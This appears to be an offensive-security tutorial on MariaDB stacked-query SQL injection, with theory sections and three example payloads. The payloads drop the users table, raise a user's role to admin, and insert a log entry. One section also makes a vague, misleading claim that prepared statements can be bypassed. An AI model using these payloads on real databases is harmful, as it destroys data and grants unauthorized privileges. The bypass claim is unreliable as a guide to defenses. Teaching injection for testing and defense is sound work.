MariaDB Stacked Queries

Context

In this article, we will explore the exploitation of MariaDB stacked queries in the context of SQL injection attacks. This technique allows an attacker to execute multiple SQL statements in a single request, which can lead to severe security vulnerabilities if inputs are not properly validated. This guide assumes that you are familiar with basic SQL syntax, database transactions, and the HTTP request/response model.

Theory

Stacked Queries in SQL Injection

Stacked queries, also known as multi-statement or multi-query SQL injection, involve executing multiple SQL statements in a single query. This technique exploits the lack of input validation in applications to execute several commands consecutively by separating them with semicolons. This sequence of semicolon-separated queries enables attackers to perform a variety of actions, such as modifying or dropping tables, inserting logs, or even changing user roles.

MariaDB Specific Considerations

MariaDB inherently supports multiple statements separated by semicolons. This capability can become a vulnerability if input handling allows semicolons within user inputs, potentially leading to arbitrary execution of commands. Improper validation and sanitization of these semicolons within inputs can expose the application to significant risks.

Bypassing Prepared Statements

While prepared statements are generally used to prevent SQL injection, poorly configured systems may still be vulnerable to stacked queries. Prepared statements can unintentionally allow additional queries if these statements are appended through injection following legitimate commands. Recognition and exploitation of this loophole can lead to unauthorized execution of commands.

Practice

MariaDB Stacked Query Injection

When manually exploiting stacked query injection in a MariaDB environment, follow these methodical steps to execute multiple queries through a single injection point:

  • Injecting a Dropping Table Command

    Consider an initial point of injection that allows retrieval of user data by ID:

    SELECT * FROM users WHERE id=1; DROP TABLE users;
    

    By injecting a semicolon, you execute both the query to select user information and subsequently drop the 'users' table.

  • Modifying a User Role

    Another use case involves elevating user privileges by changing their role:

    SELECT * FROM users WHERE id=1; UPDATE users SET role='admin' WHERE id=1;
    

    Here, after retrieving user data, a subsequent update query modifies the role of the user with id 1 to 'admin'.

  • Logging an Injected Action

    An example showing the injection of a logged statement into an application's logs:

    SELECT * FROM users WHERE id=1; INSERT INTO logs (action) VALUES ('injected');
    

    This injection allows for adding an 'injected' action entry into the logs table immediately following the selection query.

In each of these examples, the outcome is the successful execution of multiple commands within a single SQL request, illustrating the potential impact of stacked query vulnerabilities.

Tools

  • sqlmap
  • Burp Suite

These tools can be employed to facilitate the exploration and exploitation of stacked query vulnerabilities, providing automated and interactive interfaces for crafting and testing multiple query injections.

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.